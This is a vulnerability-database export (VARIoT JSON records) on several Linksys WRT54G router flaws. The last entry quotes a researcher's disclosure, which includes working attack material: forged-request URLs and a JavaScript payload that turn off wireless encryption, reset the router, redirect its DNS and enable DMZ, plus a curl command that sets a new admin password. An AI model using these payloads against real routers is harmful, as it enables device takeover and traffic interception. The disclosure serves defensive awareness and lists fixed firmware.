"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:41:45.634000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2434"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/14407"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1014596"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/16271"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21635"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=112258422806340\u0026w=2"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/21635"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=112258422806340\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/406749"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=112258422806340\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/16271/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "PACKETSTORM",
"id": "38955"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "PACKETSTORM",
"id": "38955"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-03T00:00:00",
"db": "VULHUB",
"id": "VHN-13643"
},
{
"date": "2005-07-28T00:00:00",
"db": "BID",
"id": "14407"
},
{
"date": "2005-08-02T23:53:24",
"db": "PACKETSTORM",
"id": "38955"
},
{
"date": "2005-08-03T04:00:00",
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"date": "2005-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-13643"
},
{
"date": "2005-07-28T00:00:00",
"db": "BID",
"id": "14407"
},
{
"date": "2017-07-11T01:32:50.640000",
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless Router Default SSL Certificate and Private Key Vulnerability",
"sources": [
{
"db": "BID",
"id": "14407"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "14407"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.9
}
}
VAR-200803-0064
Vulnerability from variot - Updated: 2023-12-18 11:27
The FTP server on the Linksys WRT54G 7 router with 7.00.1 firmware does not verify authentication credentials, which allows remote attackers to establish an FTP session by sending an arbitrary username and password. WRT54G v1.0 is prone to a remote security vulnerability.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0064",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "7.00.1"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.077.00.1"
}
],
"sources": [
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:7:*:7.00.1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1268"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85076"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1268",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2008-1268",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-31393",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1268",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-146",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-31393",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The FTP server on the Linksys WRT54G 7 router with 7.00.1 firmware does not verify authentication credentials, which allows remote attackers to establish an FTP session by sending an arbitrary username and password. WRT54G v1.0 is prone to a remote security vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "VULHUB",
"id": "VHN-31393"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1268",
"trust": 2.8
},
{
"db": "XF",
"id": "41119",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BID",
"id": "85076",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31393",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"id": "VAR-200803-0064",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:27:54.541000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://swbae.egloos.com/1701135"
},
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41119"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41119"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1268"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1268"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31393"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85076"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31393"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85076"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"date": "2018-10-11T20:31:26.137000",
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G 7 On the router FTP On the server FTP Session establishment vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
],
"trust": 0.6
}
}
VAR-200803-0170
Vulnerability from variot - Updated: 2023-12-18 11:26
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202. This issue may overlap with CVE-2006-5202. A third party may perform any administrator action through the following direct requests: (1) Advanced.tri (2) AdvRoute.tri (3) Basic.tri (4) ctlog.tri (5) ddns.tri (6) dmz.tri (7) factdefa.tri (8) filter.tri (9) fw.tri (10) manage.tri (11) ping.tri (12) PortRange.tri (13) ptrigger.tri (14) qos.tri (15) rstatus.tri (16) tracert.tri (17) vpn.tri (18) WanMac.tri (19) WBasic.tri (20) WFilter.tri. Linksys WRT54G Wireless-G Router is prone to multiple authentication-bypass vulnerabilities. Successful exploits will allow unauthorized attackers to gain access to administrative functionality and completely compromise vulnerable devices; other attacks are also possible. The issues affect firmware v1.00.9; other versions may also be vulnerable. ----------------------------------------------------------------------
TITLE: Linksys WRT54G Security Bypass Vulnerability
SECUNIA ADVISORY ID: SA29344
VERIFY ADVISORY: http://secunia.com/advisories/29344/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: meathive has reported a vulnerability in Linksys WRT54G, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to improper authorization checks when performing administrative actions via the web interface. This can be exploited to perform restricted actions by directly accessing Basic.tri, factdefa.tri, manage.tri, WBasic.tri, WFilter.tri, dmz.tri, ddns.tri, WanMac.tri, AdvRoute.tri, Advanced.tri, fw.tri, vpn.tri, filter.tri, PortRange.tri, ptrigger.tri, qos.tri, ctlog.tri, ping.tri, tracert.tri, or rstatus.tri.
SOLUTION:
WRT54G v5/v6: Install version 1.02.5.
WRT54G v8: Install version 8.00.5.
WRT54G v8.2: Install version 8.2.05.
PROVIDED AND/OR DISCOVERED BY: meathive
ORIGINAL ADVISORY: http://kinqpinz.info/lib/wrt54g/own.txt
++| Intro
This text is in addition to the findings I have already made public regarding the Linksys WRT54G wireless router and firewall gateway device. The scripts that process configuration changes do not require authentication and therefore can be altered remotely via simple form submissions written in HTML and submitted using JavaScript. Please refer to the bottom of this text for my previous findings and the demo page with sample exploits.
++| Let's Get Dirty
You may find my original demonstration page at https://kinqpinz.info/lib/wrt54g/. It basically shows how forms can be constructed in HTML that take advantage of the major flaws present within the insecure router. In my previous documentation I showed how it is possible to alter configuration parameters both via Linux command line using curl and HTML form submissions. In this text I demonstrate how to do these very same things transparently using a combination of HTML form construction with JavaScript that automagically submits our desired changes.
The JavaScript is simple and is only used for submitting the form - a user-free mechanism that will redirect the user to their router and prompts them to log in. Once again, THE REQUEST TO AUTHENTICATE TO THE DEVICE IS NOT REQUIRED IN ORDER TO CHANGE ITS SETTINGS. The following is all that is required in order to submit our form that will be constructed using GET parameters observed from the device's Web interface.
document.f.submit();
This submits forms hidden within the Webpage. Our first example code enables wireless access with an SSID of our choosing. In this instance, I will use the SSID "kinqpinz".
The reason this works is simple: configuration parameters are constructed in the URL in the Web interface, hosted by default at the address http://192.168.1.1. One can view these parameters while configuring their device. The code above simply constructs a URL that is processed by the router's IOS script WBasic.tri. The URL resembles the following if you were to view it within your browser:
http://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
It's simple enough to understand what's going on. Each variable passed in the URL describes exactly what its purpose is - at least the important ones such as "SSID" and "channel". The only tricky part to exploiting the router is the fact that you cannot alter settings using a URL like the one above. That would result in a GET request on behalf of the device, whereas we're interested in POST requests that actually trigger configuration changes. A GET request does nothing. Below I describe a real world attack scenario that makes use of knowledge about the device, embedded HTML + JavaScript, and a touch of PHP to grab the mark's external IP.
++| Remote Real World Attack Scenario
So http://www.hacker.tld hosts an evil page that wants to compromise your Linksys WRT54G router. It has made a few assumptions about your environment, however. One major assumption is that you've kept your router's default local gateway address, namely 192.168.1.1. No matter what other changes you've made to the router in terms of security, e.g., strong password, wireless encryption, access restrictions - they are useless. So this brings us to an important lesson concerning the WRT54G: do NOT retain the default local address of 192.168.1.1. It is important that you change this address so that you do not fall victim to a malicious individual hosting code that will be presented in this text. Changing the address does not add the missing authentication check, so it is a stopgap only; the firmware versions listed in the Secunia advisory above are the fix.
++| Remote Real World Attack Scenario Requirements
On http://www.hacker.tld a page is hosted that contains the following: (1) hidden HTML forms that contain the values/params needed to configure the WRT54G remotely; (2) JavaScript that submits these forms transparently; (3) PHP or similar server-side code that acquires the mark's external IP address as they browse the page; and, (4) PHP or similar server-side code that retains the mark's external IP address in the event that the remote form submission is successful, thus allowing the remote attacker to further exploit the device.
http://www.hacker.tld/index.php contains the following code for achieving its purpose. To begin, PHP is used - though any server-side language is suitable - for obtaining the external IP of any individual viewing the exploit page and writes this information to a log file.
The JavaScript is as simple as retrieving the form object identified by the 'name' HTML attribute and submitting the form.
document.f.submit();
All hacker.tld needs now are the forms used to store the URL params, conveniently hidden using the HTML form's 'hidden' attribute.
What you should observe from this is the form name of "f" which is used in the JS to submit the form as well as the various 'name' and 'value' attributes that are used to create a URL such as this:
submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en
Do note that without any one of these parameters, the exploit fails and nothing changes. All of the elements must remain in place even if they do not directly make sense. They are simply options that the processing script, in this case WBasic.tri, requires prior to fulfilling the request. Case matters and do not forget that the request must be POST, not GET. Also different config changes require different scripts, so WBasic.tri is not used for, say, enabling/disabling the firewall log.
Now that the malicious page has been composed and sits online living and waiting for marks at http://www.hacker.tld/index.php, as each request is made to the page it is logged using our custom PHP logging script. In mark.txt, our logging file, sample output would resemble something like the following.
Potential mark resides at 1.1.1.1
Potential mark resides at 2.2.2.2
Potential mark resides at 3.3.3.3
So forth...
They are potential marks because it is unknown whether or not they are using the WRT54G with a supported firmware version that is exploitable using these techniques, and/or the exploit attempt failed, perhaps because our mark cancelled the request before it could be fulfilled, or they are not using the default local address (good for them) that this attack relies on.
When they browse the page, because we have set no timeout for this change to occur, they are instantly redirected to http://192.168.1.1/WBasic.tri. The URL, because it is not a GET request, does not inform the user if they were educated enough of what has just happened, so they may continue on doing whatever they were doing, more often than not unaware of what has just happened. At the same time our PHP script has logged this access attempt to mark.txt which we can retrieve at our leisure and further test the remote host whether or not they are vulnerable to attack. At the very least, we may decide to completely reset the router to rest assured we know its current state to make further compromise a snap, such as altering the device's DNS records for sniffing traffic. This is quite feasible, here's how.
This gives us the following URL: http://192.168.1.1/factdefa.tri?FactoryDefaults=Yes&layout=en
Now we can change the DNS again at our leisure, perhaps to our own DNS server that intercepts/logs all incoming and outgoing requests before passing them on to the next in line.
This is indeed convoluted but all of these values must be in place in order to be successful. What is it doing? It overrides whatever DNS settings were set either by our mark or by their ISP with our own custom values, in this instance DNS server #1 is set to 1.2.3.4, DNS server #2 is set to 5.6.7.8, and DNS server #3 is set to 9.8.7.6. Typically these values are populated by the router itself while obtaining its dynamic IP from the ISP. In case you're curious, these forms are used to construct the following URL that is submitted to http://192.168.1.1/Basic.tri.
http://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en
++| An Alternative (with JavaScript)
This is the basic exploitation method of the router although the attacker has many alternatives of submitting configuration changes assuming you allow client-side scripts to execute, namely JavaScript. A few alternative methods would include using a JavaScript onClick function within a standard looking HTML anchor tag to submit the information with XMLHttpRequest, e.g.:
...where xhrRequest uses and submits preset configuration parameters upon our mark clicking on this standard looking navigation link, e.g.:
var xhr=false; if(window.XMLHttpRequest) { xhr=new XMLHttpRequest(); } else if(window.ActiveXObject) { xhr=new ActiveXObject("Microsoft.XMLHTTP"); } function xhrRequest() { if(xhr) { xhr.open("POST", "http://192.168.1.1/Security.tri", true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.onreadystatechange=function() { if(xhr.readyState == 4 && xhr.status == 200) { var success=xhr.responseText; } } xhr.send("SecurityMode=0&layout=en"); } }
The example above effectively disables all wireless encryption so that if you happen to live close enough to this poor individual, it is your duty to pwn their wireless by enabling open access for everybody in the neighborhood! Here's the URL for disabling wireless encryption:
http://192.168.1.1/Security.tri?SecurityMode=0&layout=en
++| An Alternative (without JavaScript)
You're still exploitable even if you do not allow scripts to execute, e.g., you use Firefox + NoScript. Our hackerific page hosted at http://www.hacker.tld/index.php can still use innocent looking methods of compromising your WRT54G. For example, user registration for a bulletin board or forum system. The site must acquire a minimal amount of information in order to create the account, so it is in submitting this data that we may submit our own payload; perhaps this time we'd like to enable DMZ for complete access to any and all shares/services on our mark's computer. Here is the URL once again:
http://192.168.1.1/dmz.tri?action=Apply&dmz_enable=1&dmz_ipaddr=100&layout=en
Again it is a different script processing the request on behalf of the router's internal operating system, dmz.tri, but it still does not require authentication prior to changing the settings we wish to change. All hacker.tld must do is replace the HTML payload with what he/she wishes to alter, e.g.:
...and add these values to their user registration page with standard username/password/e-mail fields... Username:Password:
Confirm Password:
...that can be found on traditional forums these days. The mark submits and exploits his/her own router although they believe they are at least minimally technically savvy by using a combination of technologies (Firefox, NoScript) to combat hackers and their methodologies. It works since the forms we use to store the router configs are hidden, and the normal user registration forms are not, thus it is unknown the nature of what supplementary data hacker.tld has appended. Even if the mark has detected that a potential attack is taking place it is likely too late as the mastermind behind http://www.hacker.tld/ is running a tail -f on his/her Web server logs to immediately snatch up targets. Once a request is submitted, the hacker knows the Linksys WRT54G makes configuration changes within 10 seconds, which is plenty of time for them to open another terminal and change the administrative login to block our mark from changing their settings, e.g.:
curl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=pwn&http_passwdConfirm=pwn&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http:///manage.tri
